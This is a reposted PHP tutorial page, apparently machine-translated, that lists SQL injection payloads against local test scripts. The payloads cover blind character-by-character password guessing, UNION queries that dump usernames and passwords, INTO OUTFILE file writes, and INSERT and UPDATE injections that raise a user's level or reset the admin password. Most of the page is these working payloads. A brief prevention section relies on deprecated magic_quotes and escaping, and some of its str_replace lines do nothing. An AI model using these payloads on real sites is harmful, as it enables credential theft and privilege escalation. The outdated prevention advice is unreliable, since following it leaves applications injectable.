Home > Backend Development > PHP Tutorial > SQL injection implementation in PHP (test code is safe and good)_PHP tutorial

SQL injection implementation in PHP (test code is safe and good)_PHP tutorial

WBOY
Release: 2016-07-21 15:32:06
Original
840 people have browsed it

The focus of SQL injection is to construct SQL statements. Only by flexibly using SQL
statements can we construct incredible injection strings. After studying, I wrote some notes and have them ready for use at any time. I hope you will
understand the basic principles of SQL when reading the following content. The code in the notes comes from the Internet.
===Basic part===
This table query:
http://127.0.0.1/injection/user.php?username=angel' and LENGTH(password)='6
http://127.0.0.1/injection/user.php?username=angel' and LEFT(password,1)='m

Union union statement:
http://127.0.0.1/injection /show.php?id=1' union select 1,username,password from user/*
http://127.0.0.1/injection/show.php?id=' union select 1,username,password from user/ *

Export file:
http://127.0.0.1/injection/user.php?username=angel' into outfile 'c:/file.txt
http://127.0.0.1 /injection/user.php?username=' or 1=1 into outfile 'c:/file.txt
http://127.0.0.1/injection/show.php?id=' union select 1,username,password from user into outfile 'c:/user.txt

INSERT statement:
INSERT INTO `user` (userid, username, password, homepage, userlevel) VALUES ('', '$username', ' $password', '$homepage', '1');
The constructed homepage value is: http://4ngel.net', '3')#
The SQL statement becomes: INSERT INTO `user` ( userid, username, password, homepage, userlevel) VALUES ('', 'angel', 'mypass', 'http://4ngel.net', '3')#', '1');

UPDATE statement: I like something like this
Understand this SQL sentence first
UPDATE user SET password='MD5($password)', homepage='$homepage' WHERE id='$id'
If This SQL is modified into the following form to achieve injection
1: modify the homepage value to
http://4ngel.net', userlevel='3
and then the SQL statement becomes
UPDATE user SET password='mypass', homepage='http://4ngel.net', userlevel='3' WHERE id='$id'
userlevel is the user level
2: Modify the password value to
mypass)' WHERE username='admin'#
Then the SQL statement becomes
UPDATE user SET password='MD5(mypass)' WHERE username='admin'#)', homepage='$homepage' WHERE id ='$id'
3: Modify the id value to
' OR username='admin'
Then the SQL statement becomes
UPDATE user SET password='MD5($password)', homepage= '$homepage' WHERE id='' OR username='admin'

===Advanced part===
Commonly used MySQL built-in functions
DATABASE()
USER()
SYSTEM_USER()
SESSION_USER()
CURRENT_USER()
database()
version()
SUBSTRING()
MID()
char()
load_file()
......
Function application
UPDATE article SET title=DATABASE() WHERE id=1
http://127.0.0.1/injection/show.php?id=-1 union select 1,database(),version()
SELECT * FROM user WHERE username=char(97,110,103,101,108)
# char(97,110,103,101,108) is equivalent to angel, decimal
http://127.0.0.1/injection/ user.php?userid=1 and password=char(109,121,112,97,115,115)http://127.0.0.1/injection/user.php?userid=1 and LEFT(password,1)>char(100)
http ://127.0.0.1/injection/user.php?userid=1 and ord(mid(password,3,1))>111

Determine the number and type of fields in the data structure
http ://127.0.0.1/injection/show.php?id=-1 union select 1,1,1
http://127.0.0.1/injection/show.php?id=-1 union select char(97 ),char(97),char(97)

Guess the data table name
http://127.0.0.1/injection/show.php?id=-1 union select 1,1,1 from members

Cross-table query to get username and password
http://127.0.0.1/ymdown/show.php?id=10000 union select 1,username,1,password,1,1,1, 1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1

Others
#Verify first password
http: //127.0.0.1/ymdown/show.php?id=10 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 ,1,1 from ymdown_user where id=1 and ord(mid(password,1,1))=49

===Injection Prevention===
Server side
magic_quotes_gpc is set to On
display_errors is set to Off
Encoding aspect
$keywords = addslashes($keywords);
$keywords = str_replace("_","_",$keywords);
$keywords = str_replace("%","%",$keywords);
Numeric type
Use intval() to replace
String type
Add single quotes to SQL statement parameters
The following code , used to prevent injection
if (get_magic_quotes_gpc()) {
//....
}else{
$str = mysql_real_escape_string($str);
$keywords = str_replace( "_","_",$keywords);
$keywords = str_replace("%","%",$keywords);
}
Useful functions
stripslashes()
get_magic_quotes_gpc()
mysql_real_escape_string()
strip_tags()
array_map()
addslashes()
Reference article:
http://www.4ngel.net/article/36 .htm (SQL Injection with MySQL) Chinese
http://www.phpe.net/mysql_manual/06-4.html (MYSQL statement reference)

www.bkjia.comtruehttp: //www.bkjia.com/PHPjc/322905.htmlTechArticleThe focus of SQL injection is to construct SQL statements. Only by using SQL statements flexibly can we construct incredible injection strings. . After studying, I wrote some notes and have them ready for use at any time. Hope you are watching...
source:php.cn
Statement of this Website
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn
Popular Tutorials
More>
Latest Downloads
More>
Web Effects
Website Source Code
Website Materials
Front End Template